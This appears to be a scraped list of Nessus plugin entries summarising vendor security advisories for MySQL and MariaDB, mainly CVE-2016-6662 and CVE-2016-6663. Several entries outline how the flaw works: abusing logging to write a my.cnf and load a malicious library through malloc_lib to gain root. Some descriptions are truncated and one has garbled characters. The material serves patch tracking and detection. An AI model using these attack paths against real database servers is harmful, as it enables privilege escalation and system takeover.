    descriptionAn update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616)
    last seen2020-06-01
    modified2020-06-02
    plugin id96756
    published2017-01-25
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96756
    titleRHEL 6 : mysql (RHSA-2017:0184)
  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2017-0035.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : - fix date in the test - Fix (CVE-2016-6662, CVE-2016-6663) Resolves: #1397309 - Fixed reload_acl_and_cache Resolves: #1281370 - Add support for TLSv1.1 and TLSv1.2 - Fixed test events_1 (end date in past) Resolves: #1287048
    last seen2020-06-01
    modified2020-06-02
    plugin id96790
    published2017-01-26
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96790
    titleOracleVM 3.3 / 3.4 : mysql (OVMSA-2017-0035)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2016-1289.NASL
    descriptionmysql-community-server was updated to 5.6.34 to fix the following issues : - Changes http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 34.html http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 33.html http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 32.html http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 31.html - fixed CVEs: CVE-2016-6304, CVE-2016-6662, CVE-2016-7440, CVE-2016-5584, CVE-2016-5617, CVE-2016-5616, CVE-2016-5626, CVE-2016-3492, CVE-2016-5629, CVE-2016-5507, CVE-2016-8283, CVE-2016-5609, CVE-2016-5612, CVE-2016-5627, CVE-2016-5630, CVE-2016-8284, CVE-2016-8288, CVE-2016-3477, CVE-2016-2105, CVE-2016-3486, CVE-2016-3501, CVE-2016-3521, CVE-2016-3615, CVE-2016-3614, CVE-2016-3459, CVE-2016-5439, CVE-2016-5440 - fixes SUSE Bugs: [boo#999666], [boo#998309], [boo#1005581], [boo#1005558], [boo#1005563], [boo#1005562], [boo#1005566], [boo#1005555], [boo#1005569], [boo#1005557], [boo#1005582], [boo#1005560], [boo#1005561], [boo#1005567], [boo#1005570], [boo#1005583], [boo#1005586], [boo#989913], [boo#977614], [boo#989914], [boo#989915], [boo#989919], [boo#989922], [boo#989921], [boo#989911], [boo#989925], [boo#989926] - append
    last seen2020-06-05
    modified2016-11-14
    plugin id94756
    published2016-11-14
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94756
    titleopenSUSE Security Update : mysql-community-server (openSUSE-2016-1289)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2016-1274.NASL
    descriptionThis update for mariadb to 10.0.27 fixes the following issues : - release notes : - https://kb.askmonty.org/en/mariadb-10027-release-notes - https://kb.askmonty.org/en/mariadb-10026-release-notes - changelog : - https://kb.askmonty.org/en/mariadb-10027-changelog - https://kb.askmonty.org/en/mariadb-10026-changelog - fixed CVE
    last seen2020-06-05
    modified2016-11-09
    plugin id94649
    published2016-11-09
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94649
    titleopenSUSE Security Update : mariadb (openSUSE-2016-1274)
  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20161103_MARIADB_ON_SL7_X.NASL
    descriptionThe following packages have been upgraded to a newer upstream version: mariadb (5.5.52). Security Fix(es) : - It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) - A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes :
    last seen2020-03-18
    modified2016-12-15
    plugin id95847
    published2016-12-15
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/95847
    titleScientific Linux Security Update : mariadb on SL7.x x86_64 (20161103)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2016-2595.NASL
    descriptionAn update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a newer upstream version: mariadb (5.5.52). (BZ#1304516, BZ#1377974) Security Fix(es) : * It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.
    last seen2020-06-01
    modified2020-06-02
    plugin id94558
    published2016-11-04
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94558
    titleRHEL 7 : mariadb (RHSA-2016:2595)
  • NASL familyDatabases
    NASL idMARIADB_5_5_51.NASL
    descriptionThe version of MariaDB running on the remote host is 5.5.x prior to 5.5.51. It is, therefore, affected by multiple vulnerabilities: - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-01
    modified2020-06-02
    plugin id93611
    published2016-09-20
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93611
    titleMariaDB 5.5.x < 5.5.51 Multiple Vulnerabilities
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-3666.NASL
    descriptionDawid Golunski discovered that the mysqld_safe wrapper provided by the MySQL database server insufficiently restricted the load path for custom malloc implementations, which could result in privilege escalation. The vulnerability was addressed by upgrading MySQL to the new upstream version 5.5.52, which includes additional changes, such as performance improvements, bug fixes, new features, and possibly incompatible changes. Please see the MySQL 5.5 Release Notes for further details : - https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5 -51.html - https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5 -52.html
    last seen2020-06-01
    modified2020-06-02
    plugin id93486
    published2016-09-15
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93486
    titleDebian DSA-3666-1 : mysql-5.5 - security update
  • NASL familyDatabases
    NASL idMYSQL_5_7_15.NASL
    descriptionThe version of MySQL running on the remote host is 5.7.x prior to 5.7.15. It is, therefore, affected by multiple vulnerabilities : - Multiple unspecified flaws exist in the Optimizer subcomponent that allow an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492, CVE-2016-5632) - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the Error Handling subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5617) - An unspecified flaw exists in the Packaging subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5625) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-01
    modified2020-06-02
    plugin id93379
    published2016-09-08
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93379
    titleMySQL 5.7.x < 5.7.15 Multiple Vulnerabilities
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2016-2343-1.NASL
    descriptionThis mysql update to verson 5.5.52 fixes the following issues: Security issues fixed : - CVE-2016-3477: Fixed unspecified vulnerability in subcomponent parser (bsc#989913). - CVE-2016-3521: Fixed unspecified vulnerability in subcomponent types (bsc#989919). - CVE-2016-3615: Fixed unspecified vulnerability in subcomponent dml (bsc#989922). - CVE-2016-5440: Fixed unspecified vulnerability in subcomponent rbr (bsc#989926). - CVE-2016-6662: A malicious user with SQL and filesystem access could create a my.cnf in the datadir and , under certain circumstances, execute arbitrary code as mysql (or even root) user. (bsc#998309) More details can be found on: http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5- 52.html http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5- 51.html http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5- 50.html Bugs fixed : - bsc#967374: properly restart mysql multi instances during upgrade - bnc#937258: multi script to restart after crash Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id93615
    published2016-09-21
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93615
    titleSUSE SLES11 Security Update : mysql (SUSE-SU-2016:2343-1)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201701-01.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201701-01 (MariaDB and MySQL: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in MariaDB and MySQL. Please review the CVE identifiers referenced below for details. Impact : Attackers could execute arbitrary code, escalate privileges, and impact availability via unspecified vectors. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id96232
    published2017-01-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96232
    titleGLSA-201701-01 : MariaDB and MySQL: Multiple vulnerabilities
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2016-0901301DFF.NASL
    descriptionUpdate to MySQL 5.7.15, Security fix for CVE-2016-6662 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2016-09-27
    plugin id93724
    published2016-09-27
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93724
    titleFedora 24 : community-mysql (2016-0901301dff)
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_DC596A177A9E11E6B034F0DEF167EEEA.NASL
    descriptionLegalHackers
    last seen2020-06-01
    modified2020-06-02
    plugin id95309
    published2016-11-25
    reporterThis script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/95309
    titleFreeBSD : Remote-Code-Execution vulnerability in mysql and its variants CVE 2016-6662 (dc596a17-7a9e-11e6-b034-f0def167eeea)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2016-58F90AE3CC.NASL
    descriptionUpdate to 10.0.27, which also includes a security fix for CVE-2016-6662. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2016-10-06
    plugin id93881
    published2016-10-06
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93881
    titleFedora 23 : 1:mariadb (2016-58f90ae3cc)
  • NASL familyDatabases
    NASL idMYSQL_5_5_53.NASL
    descriptionThe version of MySQL running on the remote host is 5.5.x prior to 5.5.53. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the Security: Encryption subcomponent that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2016-5584) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the Error Handling subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5617) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-01
    modified2020-06-02
    plugin id94165
    published2016-10-20
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94165
    titleMySQL 5.5.x < 5.5.53 Multiple Vulnerabilities (October 2016 CPU)
  • NASL familyDatabases
    NASL idMYSQL_5_5_52_RPM.NASL
    descriptionThe version of MySQL running on the remote host is 5.5.x prior to 5.5.52. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-04
    modified2016-09-08
    plugin id93376
    published2016-09-08
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93376
    titleMySQL 5.5.x < 5.5.52 Multiple Vulnerabilities
  • NASL familyAmazon Linux Local Security Checks
    NASL idALA_ALAS-2016-756.NASL
    descriptionIt was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server.
    last seen2020-06-01
    modified2020-06-02
    plugin id94022
    published2016-10-13
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94022
    titleAmazon Linux AMI : mysql55 / mysql56 (ALAS-2016-756)
  • NASL familyDatabases
    NASL idMYSQL_5_7_16_RPM.NASL
    descriptionThe version of MySQL running on the remote host is 5.7.x prior to 5.7.16. It is, therefore, affected by multiple vulnerabilities : - Multiple integer overflow conditions exist in s3_srvr.c, ssl_sess.c, and t1_lib.c due to improper use of pointer arithmetic for heap-buffer boundary checks. An unauthenticated, remote attacker can exploit this to cause a denial of service. (CVE-2016-2177) - An information disclosure vulnerability exists in the dsa_sign_setup() function in dsa_ossl.c due to a failure to properly ensure the use of constant-time operations. An unauthenticated, remote attacker can exploit this, via a timing side-channel attack, to disclose DSA key information. (CVE-2016-2178) - A denial of service vulnerability exists in the DTLS implementation due to a failure to properly restrict the lifetime of queue entries associated with unused out-of-order messages. An unauthenticated, remote attacker can exploit this, by maintaining multiple crafted DTLS sessions simultaneously, to exhaust memory. (CVE-2016-2179) - An out-of-bounds read error exists in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation. An unauthenticated, remote attacker can exploit this, via a crafted time-stamp file that is mishandled by the
    last seen2020-06-04
    modified2016-10-21
    plugin id94198
    published2016-10-21
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94198
    titleMySQL 5.7.x < 5.7.16 Multiple Vulnerabilities (October 2016 CPU) (SWEET32)
  • NASL familyAmazon Linux Local Security Checks
    NASL idALA_ALAS-2017-800.NASL
    descriptionIt was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-5616 , CVE-2016-6663)
    last seen2020-06-01
    modified2020-06-02
    plugin id97329
    published2017-02-23
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97329
    titleAmazon Linux AMI : mysql51 (ALAS-2017-800)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2016-1062.NASL
    descriptionAccording to the versions of the mariadb packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to Server: Optimizer.(CVE-2016-3492) - Unspecified vulnerability in Oracle MySQL 5.5.50 and earlier, 5.6.31 and earlier, and 5.7.13 and earlier allows remote authenticated users to affect availability via vectors related to DML.(CVE-2016-5612) - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows local users to affect confidentiality, integrity, and availability via vectors related to Server: MyISAM.(CVE-2016-5616i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier allows remote authenticated users to affect availability via vectors related to DML.i1/4^CVE-2016-5624i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to GIS.i1/4^CVE-2016-5626i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote administrators to affect availability via vectors related to Server: Federated.i1/4^CVE-2016-5629i1/4%0 - Oracle MySQL through 5.5.52, 5.6.x through 5.6.33, and 5.7.x through 5.7.15 MariaDB before 5.5.51, 10.0.x before 10.0.27, and 10.1.x before 10.1.17 and Percona Server before 5.5.51-38.1, 5.6.x before 5.6.32-78.0, and 5.7.x before 5.7.14-7 allow local users to create arbitrary configurations and bypass certain protection mechanisms by setting general_log_file to a my.cnf configuration. NOTE: this can be leveraged to execute arbitrary code with root privileges by setting malloc_lib.i1/4^CVE-2016-6662i1/4%0 - A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.i1/4^CVE-2016-6663i1/4%0 - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to Server: Types.i1/4^CVE-2016-8283i1/4%0 Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-05-06
    modified2017-05-01
    plugin id99824
    published2017-05-01
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99824
    titleEulerOS 2.0 SP1 : mariadb (EulerOS-SA-2016-1062)
  • NASL familyDatabases
    NASL idMARIADB_10_1_17.NASL
    descriptionThe version of MariaDB running on the remote host is 10.1.x prior to 10.1.17. It is, therefore, affected by multiple vulnerabilities : - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-01
    modified2020-06-02
    plugin id93610
    published2016-09-20
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93610
    titleMariaDB 10.1.x < 10.1.17 Multiple Vulnerabilities
  • NASL familyDatabases
    NASL idMYSQL_5_5_52.NASL
    descriptionThe version of MySQL running on the remote host is 5.5.x prior to 5.5.52. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-01
    modified2020-06-02
    plugin id93375
    published2016-09-08
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93375
    titleMySQL 5.5.x < 5.5.52 Multiple Vulnerabilities
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-624.NASL
    descriptionDawid Golunski discovered that the mysqld_safe wrapper provided by the MySQL database server insufficiently restricted the load path for custom malloc implementations, which could result in privilege escalation. The vulnerability was addressed by upgrading MySQL to the new upstream version 5.5.52, which includes additional changes, such as performance improvements, bug fixes, new features, and possibly incompatible changes. Please see the MySQL 5.5 Release Notes for further details : https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-51.html https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html For Debian 7
    last seen2020-03-17
    modified2016-09-19
    plugin id93564
    published2016-09-19
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93564
    titleDebian DLA-624-1 : mysql-5.5 security update
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2016-2595.NASL
    descriptionFrom Red Hat Security Advisory 2016:2595 : An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a newer upstream version: mariadb (5.5.52). (BZ#1304516, BZ#1377974) Security Fix(es) : * It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.
    last seen2020-06-01
    modified2020-06-02
    plugin id94715
    published2016-11-11
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94715
    titleOracle Linux 7 : mariadb (ELSA-2016-2595)
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_856B88BF798411E681E7D050996490D0.NASL
    descriptionDawid Golunski reports : An independent research has revealed multiple severe MySQL vulnerabilities. This advisory focuses on a critical vulnerability with a CVEID of CVE-2016-6662 which can allow attackers to (remotely) inject malicious settings into MySQL configuration files (my.cnf) leading to critical consequences.
    last seen2020-06-01
    modified2020-06-02
    plugin id93496
    published2016-09-15
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93496
    titleFreeBSD : mysql -- Remote Root Code Execution (856b88bf-7984-11e6-81e7-d050996490d0)
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_B64A73897C2711E68AAA5404A68AD561.NASL
    descriptionLegalHackers
    last seen2020-06-01
    modified2020-06-02
    plugin id93582
    published2016-09-19
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93582
    titleFreeBSD : Remote-Code-Execution vulnerability in mysql and its variants CVE 2016-6662 (b64a7389-7c27-11e6-8aaa-5404a68ad561)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2016-2404-1.NASL
    descriptionThis update for mariadb to 1.0.0.27 fixes the following issues: Security issue fixed : - CVE-2016-6662: A malicious user with SQL and filesystem access could create a my.cnf in the datadir and, under certain circumstances, execute arbitrary code as mysql (or even root) user. (bsc#998309) - release notes : - https://kb.askmonty.org/en/mariadb-10027-release-notes - changelog : - https://kb.askmonty.org/en/mariadb-10027-changelog Bugs fixed : - Make ORDER BY optimization functions take into account multiple equalities. (bsc#949520) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id93771
    published2016-09-28
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93771
    titleSUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:2404-1)
  • NASL familyDatabases
    NASL idMYSQL_5_5_53_RPM.NASL
    descriptionThe version of MySQL running on the remote host is 5.5.x prior to 5.5.53. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the Security: Encryption subcomponent that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2016-5584) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the Error Handling subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5617) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-04
    modified2016-10-21
    plugin id94196
    published2016-10-21
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94196
    titleMySQL 5.5.x < 5.5.53 Multiple Vulnerabilities (October 2016 CPU)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2016-1154.NASL
    descriptionThis update for mariadb to 10.0.27 fixes the following issues : Security issue fixed : - CVE-2016-6662: A malicious user with SQL and filesystem access could create a my.cnf in the datadir and, under certain circumstances, execute arbitrary code as mysql (or even root) user. (bsc#998309) - release notes : - https://kb.askmonty.org/en/mariadb-10027-release-notes - changelog : - https://kb.askmonty.org/en/mariadb-10027-changelog Bugs fixed : - Make ORDER BY optimization functions take into account multiple equalities. (bsc#949520) This update was imported from the SUSE:SLE-12-SP1:Update update project.
    last seen2020-06-05
    modified2016-10-05
    plugin id93854
    published2016-10-05
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93854
    titleopenSUSE Security Update : mariadb (openSUSE-2016-1154)
